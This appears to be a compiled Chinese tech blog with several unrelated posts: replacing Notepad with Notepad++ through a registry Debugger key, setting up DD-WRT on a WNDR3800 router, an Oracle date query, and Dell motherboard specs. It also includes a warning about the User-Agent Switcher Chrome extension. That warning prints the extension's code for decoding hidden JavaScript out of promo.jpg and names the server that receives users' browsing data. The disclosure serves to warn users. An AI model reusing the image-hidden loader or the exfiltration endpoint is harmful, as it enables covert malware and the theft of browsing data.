用notepad++替换系统自带的记事本notepad

Replace Notepad
Notepad is a default text editor shipped with Windows. You may want to use Notepad++ instead of Notepad. However, there's no obvious way to do it.
From the version 7.5.9 you can run the following command to make Notepad++ replace Notepad (run in cmd.exe with Administrator privileges):

notepad记事本是windows默认的文本编辑器。从Notepad++ 7.5.9这个版本开始你可以通过以下命令将Notepad++设置为Windows默认编辑器。注意:命令需要管理员权限执行。

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v "Debugger" /t REG_SZ /d "\"%ProgramFiles(x86)%\Notepad++\notepad++.exe\" -notepadStyleCmdline -z" /f

如果你安装的是64位的Notepad++,需要把"%ProgramFiles(x86)%\Notepad++\"替换为"%ProgramFiles%\Notepad++\"。

如果需要重置为记事本,管理员权限运行以下命令:

reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v "Debugger" /f

WNDR3800刷DD-WRT+DDNS+远程WEB SSH管理+远程唤醒内网机

刷机

进DD-WRT官网下载WNDR3800固件, 根据网上的经验,先把wndr3800的原厂固件版本从1.0.0.52降级到1.0.0.16。然后再从web管理界面上传dd-wrt的wndr3800-factory.img刷机。等待一会儿就刷机成功了。

打开JFFS

默认dd-wrt的整个文件系统都是只读的。/tmp目录是内存,重启路由器之后文件就没了。所以需要打开JFFS(Journalling Flash File System (JFFS/JFFS2) is a re-writable area within a DD-WRT-enabled device.)功能。
打开JFFS的步骤:打开路由器管理界面。跳转到JFFS支持节点
点击Enable JFFS 点击保存,等待一会点击应用。
等待一会儿。点击Enable Clean JFFS。不要点击保存,点击应用。这是路由器会格式化剩余的空间。
等待片刻,将Clean JFFS Disable掉。点击保存。重启路由器,此时路由器应该有几MB的永久存储空间了。通过/jffs目录可以访问,存取文件。

DDNS动态域名

刚开始打算用dnspod的ddns,折腾了半天的linux shell发现dnspod的ddns修改了接口,出现record line invalid等错误。为了让ddns提前能用,改用3322.org。这个太简单了。ddwrt已经内置了3322.org,填写进你的用户名密码和***.f3322.net的免费动态域名即可。我这里force update interval设置的是1。表示每一天强制更新一个ip。

远程管理ssh+web

很有可能电信isp会禁用默认的80、21、22等端口,我设置一个10000以上的大端口号就行。在Adminsitration - Management - Remote Access里面分别设置WebGUI、SSH、Telnet等服务的端口号即可。

远程唤醒内网机

方法也很简单, 内网需要环境的主机mac地址记录以下,然后在Administration - WOL 里面设置需要唤醒的内网主机MAc地址和广播地址即可。点击Wake Up即可开机。关机也很简单,写一个批处理内容:shutdown -t 0 -s

Chrome插件User-Agent Switcher为木马程序,请尽快卸载

User-Agent Switcher for Google Chrome
提供方:useragentswitcher.org
此为插件里面包含恶意代码。
useragentswitcher.org提供的插件都不要下载。很是怀疑!

今天打开京东jd.com自动跳转到一些莫名其妙的网站。他会记录你的访问记录并发送到他的服务器(https://uaswitcher.org/logic/page/data)。chrome商店里面从2017年就有人举报此插件有毒。现在2018年年末的Chrome官方还提供下载。可见官方审核并不严格且效率低下。

恶意程序,访问京东jd.com会定时进行跳转 http://rtbs24.com/?target=https%3A%2F%2Fytthn.com%2Fclick-IQL4686A-HFDQCIIE%3Fbt%3D25%26tl%3D1%26sa%3D116%26url%3Dhttps%3A%2F%2Fwww.jd.com%2F,真心垃圾

大家不要用了,这个扩展含有木马。

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里。

然后 background.js 的第 80 行,从 promo.jpg 图片里解密出恶意代码并执行。

包含的行为包括:

会把你打开的每个 tab 的 url 等信息加密发送到 uaswitcher.org/logic/page/data

另外还会从 api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码。

详情讨论见:www.v2ex.com/t/389340

chrome 商店搜索 User-Agent Switcher,排第一的这个插件(45 万用户),是一个木马...

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

为了绕过 chrome 的审核策略,他把恶意代码隐藏在了 promo.jpg 里
background.js 的第 80 行,从这个图片里解密出恶意代码并执行

t.prototype.Vh = function(t, e) {
            if ("" === '../promo.jpg') return "";
            void 0 === t && (t = '../promo.jpg'), t.length && (t = r.Wk(t)), e = e || {};
            var n = this.ET,
                i = e.mp || n.mp,
                o = e.Tv || n.Tv,
                h = e.At || n.At,
                a = r.Yb(Math.pow(2, i)),
                f = (e.WC || n.WC, e.TY || n.TY),
                u = document.createElement("canvas"),
                p = u.getContext("2d");
            if (u.style.display = "none", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 === u.height) return "";
            e.height && e.width ? p.drawImage(t, 0, 0, e.width, e.height) : p.drawImage(t, 0, 0);
            var c = p.getImageData(0, 0, u.width, u.height),
                d = c.data,
                g = [];
            if (c.data.every(function(t) {
                    return 0 === t
                })) return "";
            var m, s;
            if (1 === o)
                for (m = 3, s = !1; !s && m < d.length && !s; m += 4) s = f(d, m, o), s || g.push(d[m] - (255 - a + 1));
            var v = "",
                w = 0,
                y = 0,
                l = Math.pow(2, h) - 1;
            for (m = 0; m < g.length; m += 1) w += g[m] << y, y += i, y >= h && (v += String.fromCharCode(w & l), y %= h, w = g[m] >> i - y);
            return v.length < 13 ? "" : (0 !== w && (v += String.fromCharCode(w & l)), v)
        }

会把你打开的每个 tab 的 url 等信息加密发送到 https://uaswitcher.org/logic/page/data
另外还会从 http://api.data-monitor.info/api/bhrule?sub=116 获取推广链接的规则,打开符合规则的网站时,会在页面插入广告甚至恶意代码.
根据 threatbook 上的信息( https://x.threatbook.cn/domain/api.data-monitor.info ),我估计下面的几个插件都是这个作者的作品..
https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

这里也有人讨论这个问题 https://news.ycombinator.com/item?id=14889619

Chrome插件User–Agent Switcher恶意代码分析报告

User-Agent Switcher for Google Chrome Virus

https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake

Oralce 按时间区间作为筛选条件查询数据

select reply.assign_investigator1,reply.assign_investigator1_tel,reply.assign_investigator2,reply.assign_investigator2_tel,
assign.case_id
from CASE_T_ASSIGN_REPLY reply
left join case_t_assign assign on assign.assign_id = reply.assign_id
where
create_time between to_date('2018-11-21 00:00:21','yyyy-mm-dd hh24:mi:ss') and to_date('2018-11-21 17:40:21','yyyy-mm-dd hh24:mi:ss')
and assign_investigator1 is not null

戴尔Studio 560s G43T-DM1主板规格

戴尔Inspiron 560 服务标签: 1Y2BW2X 快速服务代码: 4236546345 Intel X4500 HD
主板,G43T-DM1 18D1Y G43+ICH10R
芯片组:INTEL G43
内存:4条 DDR3内存槽
775针 DDR3 775架构酷睿单核,酷睿2双核,酷睿2四核 Intel Core2 Quad Q9550 (130¥,排名850)
ECS G43T-DM1 G43 Motherboard. ECS meets the current and future demands of high performance, power embedded computing, making it ideal for communications, transaction terminal, interactive client, industrial automation applications as well as for standard home use.

Manufacturer: ECS ,台湾精英代工
Part Number: G43T-DM1 18DY1 018DY1 CN018DY1 CN-018DY1

Specifications:

Socket 775 architecture
mATX form factor
Intel G43 / ICH10 chipset
4 x 240-pin DDR3 DIMM slots
Supports up to 8 GB DDR3 dual channel memory (1066 MHz)
Integrated Intel Graphics Media Accelerator X4500 with up to 1759 MB dynamic video memory
Integrated Realtek ALC 888S 8-channel HD audio
Integrated Atheros AR8121-L1E Gigabit Ethernet LAN
4 x Serial ATA 3.0 Gb/s ports
24-pin ATX power connector
4-pin ATX12V power connector
Lead-free components (RoHS compliant)

Expansion Slots:

1 x PCI Express x 16 slot
2 x PCI Express x 1 slots
1 x PCI slot

I/O Ports:

1 x VGA port
1 x HDMI out
4 x USB 2.0 ports
1 x RJ-45 GbLAN
Line in, line out, microphone audio
Side, rear, c/sub audio

Internal Headers:

1 x SPDIF header
1 x front panel header
1 x front panel audio header
1 x CD-In
1 x 9-pin Serial/COM header
3 x USB 2.0 headers (six ports total)

Supported Processors:

Socket 775
1333/1066/800 MHz FSB speeds
Intel Core 2 Quad
Intel Core 2 Duo
Intel Pentium Dual-Core
Intel Celeron Dual-Core
Intel Celeron 4xx-series